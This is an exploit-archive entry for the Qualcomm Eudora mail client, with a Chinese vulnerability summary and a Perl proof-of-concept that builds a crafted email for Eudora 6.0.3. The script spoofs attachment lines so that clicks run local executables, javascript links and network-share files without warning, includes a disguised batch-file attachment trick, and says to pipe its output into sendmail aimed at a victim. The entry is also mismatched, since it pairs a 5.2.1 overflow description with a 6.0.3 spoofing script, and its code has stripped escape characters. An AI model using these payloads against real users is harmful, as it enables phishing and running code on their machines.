https://www.exploit-db.com/exploits/23374
https://www.securityfocus.com/bid/87123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-072

Eudora5.2.1版本存在缓冲区溢出漏洞。远程攻击者借助带有超多.（点）字符的AttachmentConverted参数导致服务拒绝（崩溃并重新启动失败）及可能执行任意代码。

source: http://www.securityfocus.com/bid/9026/info

A vulnerability has been reported by Qualcomm that may be exploited by a remote attacker to cause the Eudora e-mail client to crash. It has been reported that a malicious email that contains a spoofed attachment converted line will trigger this issue in a vulnerable release of Eudora when the malicious message is viewed. 

#!/usr/bin/perl --

use MIME::Base64;

print "From: men";
print "To: youn";
print "Subject: Eudora 6.0.3 on Windows spoof, LaunchProtectn";
print "MIME-Version: 1.0n";
print "Content-Type: multipart/mixed; boundary="zzz"n";
print "n";
print "This is a multi-part message in MIME format.n";
print "--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitn";
print "n";

print "Pipe the output of this script into:   sendmail -i victimn";

print "nWith spoofed attachments, we could 'steal' files if the
message
was forwarded (not replied to).n";

print "nWithin plain-text email (or plain-text, inline MIME parts)
embedded
CR=x0d characters get converted internally into a NUL=x00 and ignored,
so we can spoof "attachment converted" lines:n";

print "nThe following work fine (but are boring and/or put up
warnings):n";
print "Attachment Convertedr: "c:\winnt\system32\calc.exe"n";
print "Attachment Convertedr: c:\winnt\system32\calc.exen";
print "(Note how JavaScript is done with IE, web with default browser
Netscape)n";
print "Attachment Convertedr: <A
href=javascript:alert(%27hello%27)>hello.txt</a>n";
print "Attachment Convertedr: <A
href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>n";
print "Attachment Convertedr: <A
href=c:/winnt/system32/calc.exe>file.txt</a>n";

print "nIf we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:n";
print "Attachment Convertedr: <A
href=H:/eudora/attach/calc>file.txt</a>n";

print "nCuteness value only:n";
print "Attachment Convertedr: <A
href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>n";

print "n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file</a>,
<a
href="http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx">http</a>
and
<a href="javascript:alert(x27hellox27)">javascript</a>
references. Any way to exploit this?
</x-html>n";

print "n<x-rich>
Can also do RTF inclusions. Can this be abused?
</x-rich>n";

print "nThose <x-xyz></x-xyz> constructs allow spoofing
attachments easily, without embedded CR:nn";
print "HTMLn";
print "<x-html></x-html>Attachment Converted: "xyz"n";
print "Richn";
print "<x-rich></x-rich>Attachment Converted: "xyz"n";
print "Flowedn";
print "<x-flowed></x-flowed>Attachment Converted: "xyz"n";

print "n";

print "n--zzzn";
print "Content-Type: text/plain; name="plain.txt"n";
print "Content-Transfer-Encoding: 7bitn";
print "Content-Disposition: inline; filename="plain.txt"n";
print "n";
print "Within a 'plain' attachment:n";
print "Attachment Convertedr: "c:\winnt\system32\calc.exe"n";

print "n--zzzn";
print "Content-Type: text/plain; name="qp.txt"n";
print "Content-Transfer-Encoding: quoted-printable n";
print "Content-Disposition: inline; filename="qp.txt"n";
print "n";
print "Within quoted-printable encoded parts still need the embedded
CR:n";
print "=41ttachment=20=43onvertedr=3a
"c:\winnt\system32\calc.exe"n";

print "n--zzzn";
print "Content-Type: text/plain; name="b64.txt"n";
print "Content-Transfer-Encoding: base64n";
print "Content-Disposition: inline; filename="b64.txt"n";
print "n";
$z = "Within base64 encoded (plain-text, inline) MIME parts, can
spoofr
without embedded CR (but line termination is CR-NL):r
Attachment Converted: "c:\winnt\system32\calc.exe"rn";
print encode_base64($z);

print "n--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitn";
print "n";

print "n=====n";

$X = 'README'; $Y = "$X.bat";
print "nThe X - X.exe dichotomy: send a plain $X attachment:n";
$z = "rem Funny jokernpausern";
print "begin 600 $Xn", pack('u',$z), "`nendn";
print "nand (in another message or) after some blurb so is scrolled
off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LauchProtect warning):n";
$z = "rem Big jokernrem Should do something nastyrnpausern";
print "begin 600 $Yn", pack('u',$z), "`nendn";

print "n=====n";

print "
Eudora 6.0.3 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an
executable
stored elsewhere to run without warning:n";
print "Attachment Convertedr: <a
href=c:/winnt/system32/calc>go.txt</a>n";
print "Attachment Convertedr: c:/winnt/system32/calcn";

print "
Can be exploited if there is more than one way into attach: in my setup
H: and \\rome\home are the same thing, but Eudora does not know
that.n";
print "These elicit warnings:n";
print "Attachment Convertedr: <a
href=h:/eudora/attach/README>readme.txt</a>n";
print "Attachment Convertedr: h:/eudora/attach/READMEn";
print "Attachment Convertedr: \READMEn";
print "Attachment Convertedr: .\READMEn";
print "Attachment Convertedr: \.\READMEn";
print "Attachment Convertedr: ?\READMEn";
print "Attachment Convertedr: \?\READMEn";
print "while these do the bad thing without warning:n";
print "Attachment Convertedr: <a
href=file://rome/home/eudora/attach/README>readme</a>n";
print "Attachment Convertedr: //rome/home/eudora/attach/READMEn";
print "Attachment Convertedr:
\\rome\home\eudora\attach\READMEn";

print "
For the default setup, Eudora knows that C:\Program Files
and C:\Progra~1 are the same thing:n";
print "Attachment Convertedr: "c:/program
files/qualcomm/eudora/attach/README"n";
print "Attachment Convertedr:
"c:/progra~1/qualcomm/eudora/attach/README"n";
print "
and also knows that various UNC references:
\\localhost\c...
\\127.0.0.1\c...
\\BIOSNAME\c...
\\DNSNAME\c...
\\IP\c...
\\\?\c...
\\c...
...c:\progr...
...c\progr...
...c:progr...
...program files\...
...progra~1\...
or even
.\NoSuchDir\..\README
//c|\Program Files\qualcomm\eudora\attach\README
\\c|\Program Files\qualcomm\eudora\attach\README
res://c:\Program Files\qualcomm\eudora\attach\README
res:\\c:\Program Files\qualcomm\eudora\attach\README
shell:Fonts\..\..\Program Files\qualcomm\eudora\attach\README
%ProgramFiles%\qualcomm\eudora\attach\README
%windir%\..\Program Files\qualcomm\eudora\attach\README
are all the same thing...
";

print "n";
print "n--zzz--n";
print "n";

Qualcomm Eudora 5.2.1

来源:BUGTRAQ
名称:20030523Eudora5.2.1bufferoverflowDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105370625529452&w;=2